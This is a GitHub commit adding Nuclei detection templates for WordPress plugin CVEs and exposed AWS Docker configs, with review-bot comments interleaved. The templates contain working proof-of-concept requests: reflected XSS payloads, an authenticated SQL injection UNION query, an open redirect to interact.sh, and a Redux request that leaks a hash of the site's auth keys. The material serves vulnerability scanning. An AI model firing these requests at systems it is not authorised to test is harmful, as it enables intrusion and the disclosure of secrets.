

20241219
actions-user committed Dec 19, 2024
1 parent 7209f40 commit d9f1761
Showing 93 changed files with 5,144 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241218
20241219
91 changes: 91 additions & 0 deletions poc.txt


59 changes: 59 additions & 0 deletions poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml
@@ -0,0 +1,59 @@
id: accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed

info:
name: >
Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "accept-authorize-net-payments-using-contact-form-7"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.2')
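Review bot: The `info` metadata ships empty — `description: >` appears to have no body, and `cvss-metrics:`, `cvss-score:` and `cve-id:` are bare keys that YAML loads as null, while `shodan-query: 'vuln:'` is a placeholder. Either fill them from the Wordfence advisory already listed under `reference` or drop the empty keys, and state in the description that detection is version-based (the template only reads `Stable tag` from readme.txt), so a hit means "a vulnerable version is advertised", not a confirmed exposure. The two `version` extractors differ only by `internal: true`; the internal one is all the `compare_versions` DSL matcher needs, and the second should be kept only if the version is wanted in the output.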
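--- a/poc/aws/amazon-docker-config-exposure.yaml
+++ b/poc/aws/amazon-docker-config-exposure.yaml
@@ -0,0 +1,17 @@
+id: amazon-docker-config-disclosure
+
+info:
+name: Dockerrun AWS Configuration Exposure
+author: pd-team
+severity: medium
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/Dockerrun.aws.json'
+matchers:
+- type: word
+words:
+- 'AWSEBDockerrunVersion'
+- 'containerDefinitions'
+condition: and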
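Review bot: This file is identical to `poc/config/amazon-docker-config-exposure.yaml` added in the same commit, and both carry `id: amazon-docker-config-disclosure`; nuclei keys templates by id, so I would expect one copy to be flagged as a duplicate and skipped — keep a single copy. The matcher block has no status check, so a response of any status that happens to contain both words would match; add a `status` matcher for `200` and set `matchers-condition: and`. It also uses the legacy `requests:` key where the template under `poc/auth/` in this commit uses `http:`; pick one form across the repository.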
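--- a/poc/config/amazon-docker-config-exposure.yaml
+++ b/poc/config/amazon-docker-config-exposure.yaml
@@ -0,0 +1,17 @@
+id: amazon-docker-config-disclosure
+
+info:
+name: Dockerrun AWS Configuration Exposure
+author: pd-team
+severity: medium
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/Dockerrun.aws.json'
+matchers:
+- type: word
+words:
+- 'AWSEBDockerrunVersion'
+- 'containerDefinitions'
+condition: and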
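--- a/poc/cve/CVE-2012-0901-2139.yaml
+++ b/poc/cve/CVE-2012-0901-2139.yaml
@@ -0,0 +1,30 @@
+id: CVE-2012-0901
+
+info:
+name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
+reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
+
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200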
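Review bot: `reference:` in the `info` block is a plain scalar while the sibling templates in this commit (e.g. `poc/cve/CVE-2014-4544-2362.yaml`) give it as a list, and the template has no `tags` or `classification` at all, so it is invisible to tag-based selection such as `-tags cve,xss`. Suggest writing `reference:` as a one-item list and adding `tags: cve,cve2012,wordpress,wp-plugin,xss` plus a `classification` block with `cve-id: CVE-2012-0901` and `cwe-id: CWE-79`, mirroring the other CVE templates here.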
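--- a/poc/cve/CVE-2014-4544-2362.yaml
+++ b/poc/cve/CVE-2014-4544-2362.yaml
@@ -0,0 +1,37 @@
+id: CVE-2014-4544
+
+info:
+name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
+author: daffainfo
+severity: medium
+description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
+reference:
+- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
+- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
+
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2014-4544
+cwe-id: CWE-79
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "</script><script>alert(document.domain)</script>"
+part: body
+
+- type: word
+part: header
+words:
+- text/html
+
+- type: status
+status:
+- 200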
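Review bot: The plugin directory in the request path, `podcast–channels`, is written with an en dash (U+2013) rather than an ASCII hyphen, so the request targets a path that will not exist on a real install and the template can never match; every other plugin slug in this commit uses `-`, and the slug here presumably does too, so change it to `podcast-channels`. Separately, `cvss-score: 6.10` is an unquoted float and loads as `6.1`; write `6.1` or quote it so the value round-trips as written.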
43 changes: 43 additions & 0 deletions poc/cve/CVE-2021-24750-5763.yaml
@@ -0,0 +1,43 @@
id: CVE-2021-24750

info:
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author: cckuakilong
severity: high
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated

requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"

- type: status
status:
- 200
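Review bot: The raw requests depend on `{{username}}` and `{{password}}` but nothing in the template says where they come from; add a sentence to `description` (or a comment above `requests:`) that credentials must be supplied at run time, e.g. via `-var username=<value> -var password=<value>`, since with no values the login step likely posts the placeholders unchanged and the template silently finds nothing. In this rendering the `Cookie:` header in the first request is followed directly by the form body; the section header counts 43 additions against 40 visible lines, so the blank separator lines were probably dropped by the page rather than missing from the file, but that is worth confirming against the raw file because without them the POST is malformed. The `requests:` key is the legacy form; the template under `poc/auth/` in this commit uses `http:`.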
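--- a/poc/cve/CVE-2021-25111-5801.yaml
+++ b/poc/cve/CVE-2021-25111-5801.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-25111
+
+info:
+name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
+author: akincibor
+severity: medium
+description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
+reference:
+- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
+tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.10
+cve-id: CVE-2021-25111
+cwe-id: CWE-601
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
+
+matchers:
+- type: regex
+part: header
+regex:
+- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1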
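Review bot: The `description` has a typo, `redirecting users o it`, which should read `redirecting users to it`. `cvss-score: 6.10` is an unquoted float and loads as `6.1`; write `6.1` (as `poc/cve/CVE-2021-39322-6339.yaml` in this commit does) or quote it. The `reference` list also lacks the NVD entry that the other CVE templates here include; add `https://nvd.nist.gov/vuln/detail/CVE-2021-25111`.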
51 changes: 51 additions & 0 deletions poc/cve/CVE-2021-38314-6300.yaml
@@ -0,0 +1,51 @@
id: CVE-2021-38314

info:
name: Redux Framework - Unauthenticated Sensitive Information Disclosure
author: meme-lord
severity: medium
reference:
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
- https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c
- https://blog.sorcery.ie/posts/redux_wordpress/

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."

requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<50"

- type: regex
name: meme
regex:
- '[a-f0-9]{32}'
part: body

- type: status
status:
- 200

extractors:
- type: regex
part: body
regex:
- "[a-f0-9]{32}"
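Review bot: The regex matcher carries `name: meme`, which reads as a leftover and says nothing about what it matches; nothing references it, so rename it to something descriptive such as `md5_hash` or drop it. The `info` block has no `tags`, so the template is invisible to tag-based selection, `description` sits after `classification` unlike the other templates in this commit, and `cvss-score: 5.30` loads as the float `5.3`; move `description` next to `name` and `severity`, add `tags: cve,cve2021,wordpress,wp-plugin,redux,unauth`, and write the score as `5.3`. The description says the disclosed value is an unsalted md5 of `AUTH_KEY` concatenated with `SECURE_AUTH_KEY`, and the final extractor writes that hash into scan output, so note in the description that results should be treated as sensitive.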
52 changes: 52 additions & 0 deletions poc/cve/CVE-2021-39322-6339.yaml
@@ -0,0 +1,52 @@
id: CVE-2021-39322

info:
name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
reference:
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322
- https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-39322
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated

requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'

- type: status
status:
- 200

- type: word
part: header
words:
- "text/html"

# Enhanced by mp on 2022/03/23
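Review bot: `reference` lists the same wpscan advisory twice — the `wpscan.com/vulnerability/5e0bf0b6-…` and `wpvulndb.com/vulnerabilities/5e0bf0b6-…` entries share one advisory id, and wpvulndb.com is, as far as I know, the former name of the same service — so drop the `wpvulndb.com` entry. As with `poc/cve/CVE-2021-24750-5763.yaml` in this commit, the raw requests need `{{username}}` and `{{password}}` but the template does not say so; add a sentence to `description` that account credentials must be supplied at run time. The trailing `# Enhanced by mp on 2022/03/23` is provenance that most YAML tooling drops on round-trip; if that history matters, git already records it.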
